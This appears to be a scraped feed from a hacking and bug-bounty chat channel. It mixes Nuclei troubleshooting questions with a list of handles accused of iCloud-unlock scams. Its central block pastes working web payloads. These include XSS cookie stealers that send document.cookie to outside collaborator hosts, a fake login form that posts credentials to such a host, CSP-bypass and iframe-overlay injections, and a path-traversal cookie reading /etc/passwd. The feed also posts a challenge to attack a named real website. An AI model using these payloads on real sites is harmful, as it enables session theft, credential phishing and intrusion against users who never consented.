hi guys,
how bypass this?
0 != i.indexOf("http") && 0 != i.indexOf("//") && (i = "//" + i)
are there any buddys could provide me with some refferences about the exploit of "Live off the land drivers"? Many thanks!
Читать полностью…Most likely problem with your network connection. Nuclei cant connect to target host and skip it out
Читать полностью…UNLOCK SCAMMERS ON THE MARKET:
@fmiofficloudunlocks 😡big😡
@minacriis 😡big
@gsmunlocksxpert😡big
@iUnlock_Apple😡big
@iUnlock_Apple_US😡big
@cidunlocker
— A-Z—
@A4star1
@AAlienFuLL
@abracobras (@dgeUnlock)
@Ahmed_1928
@Applboy
@apple_hubs
@Apple_Support87
@apple_unlocking
@appledone
@applefishers
@AppleNewSolution (@OnlinehelpApp)
@appleSolution9
@ApsUnlocking
@arjan_unlock
@arsalangsm
@automatedpanel
@BaliUnlocker
@Bestunlockertz
@bLanc00fficial
@Boss_SmS
@BOSS_UNLOCK
@BossManTech
@DemonServices
@Ecampoverde
@elchapo55555
@Enemy17Tech
@fegunlocks
@financialservicex
@FineChina01 (@AmaizingF)
@finoallfino
@FMI_OFF_OFF
@Fmioff_new
@FoneZone
@gadum5
@ghana_reseller
@glk2050
@Gsm_Ahsan
@GSM_unl0cker
@gsmflashingmobil
@gsmonster2000
@gsms0lution (@EFI0Macbook0)
@GSMSMITH
@GSMSOLUTION100
@gsmsonic
@gsmunlocksxpert
@GSMT3CH
@gsmtanzania1
@Hackerbo_24
@HAFIZ_GSM
@iboyapple
@Icloud_kingg
@icloud_unlock123
@icloud0onoom
@iCloudBosssss4u
@icloudnumberon
@iHelloUnlocker
@imei4unlock
@iOSUnlocking
@iphonecare170
@Iphoneunlocksupport
@iSethos01
@isklm
@iunkownlcloud
@Iunlocker725
@iunlocker786apple
@javed_unlocks
@jevfx0
@John7726
@Johnkenedii
@JohTec
@JokerFmiKing
@kehlanaushan
@kelvin_hacks
@khaad47
@kitpro3
@knoxbypass
@l3gitch3ck
@LambdaICoder
@LeoSoft941Support_bot
@lifeg1
@lifeg1
@linkunlockingstore
@Lost_clean011
@Lost_clean4fast4
@Lost_Gulf_RSA
@mac1t1m1
@mankind56
@mankind56
@mankind56
@marikues
@markoj21
@matrixTopG1
@mikesshady
@mimshak3511
@Mkaburu2
@mobile_unlocks
@moh_apple_fix
@Moneyboss976
@Mr_iCl0ud
@n0stra
@Official_gsm_unlock
@Oliverjarb
@On_To_OFF
@PANEL1SERVICE
@passcodeadmin
@pedrounlocks
@phone_center_1
@Prof_Apple
@Raju3219
@rjctd00
@robsapple
@SA_Apple_Pvt
@sixtriger001
@SmartGSMSolutions
@SMDRAMDISK6
@SMITH706 (@Abhi4343)
@sms_kit
@Soh143
@sohail004
@styfan_here
@Superpandaunlock
@Sure9919
@sydneyza
@TankGsm
@Thefoxhimselff
@trimer0
@Unlock_GSM09
@unlockbestworld
@UnlockerDev
@unlockfastest
@Unlockicloud_Nades
@Usavisa12
@venom_unlocker
@xanderroman
@XpertCleanUnlockerr
@yacine_bennacer
@yamalencok (@kuataoo)
@zayna31
@Zer3K
List will be updated daily, don't deal with this guys.
Here will be added only scammers with proof. Don't come and request adding someone without proofs.
you can see Latest list : /channel/+fgD0OZiqEnNjMTA1
Unlock scammer list
240427
Hello guys , I'm running nuclei, but why do I always get skipped information, is it because of the network? Or is the SSH factor limited? Or are there other factors
Читать полностью…On my target.
I logout then intercept with Burpsuite then send to repeater and dropped the proxy.
I clear all the cookies in the request form then I generated PoC. I click on the PoC HTML file then it load then I got logout from my account.
Csrf vulnerability?
<A HREF="http://evil.com/">Login Here </A>
<script>document.location.href="http://evil.com"</script>
<h3>Please login to proceed</h3> <form action=http://abp16yqa8m56p2kznk76xvmnqew5kwakz.oastify.com>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Login"></br>
csp bypass:
<script>alert(1)</script>&token=;script-src-elem 'unsafe-inline'
iframe:
"><iframe src="https://nasa.gov" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%">
<IFRAME SRC="javascript:alert(document.cookie);"></iframe>
cookie stealer:
<script>document.location='http://sb7j6gqs845opkkhn27oxdm5qwwnks8h.oastify.com?c='+document.cookie</script>
<script>new Image().src="http://localhost/cookie.php?c="+document.cookie</script>
<script>document.body.background=”https://www.jhadol.com/images/photos/original/1465212129eukl.jpg“;</script>
<script>window.location=”https://coffinxp.000webhostapp.com/coffinxp1.html”;</script>
<script>document.body.bgColor=”red”;</script>
🔥Challenge ⚡🕷️Xss🕷️⚡
📊level: Medium
🌐 Target:
https://www.transpakcorp.com
🔴rules:
👉Print your name, cookies, and...useragent
👉Share a screenshot of your proof and do not post the solution
Are there any experts on WebSocket here? Is there an equivalent of Burp that can modify the contents of a WebSocket packet on the fly?
Читать полностью…Its optimization. Lets suppose than 5 templates make request to the /admin endpoint => templates clustered => all 5 templates will analyze response of 1 request to the /admin
Читать полностью…Actually my network is very normal, is there any possibility of restrictions from the VPS service provider?
Читать полностью…What do you mean skipped information,if you want more informative scan use -v or -vv
Читать полностью…How to find local file read vulnerabilities based on cookies.
Request
GET /vulnerable.php HTTP/1.1
Cookie:usid=../../../../../../../../../../../../../etc/pasdwd
Response
HTTP/1.1 200 OK
...
Server: Apache root:fi3sER6:0:1:System Operator:/:/bin/ksh//
#bugbounty #bugbountytip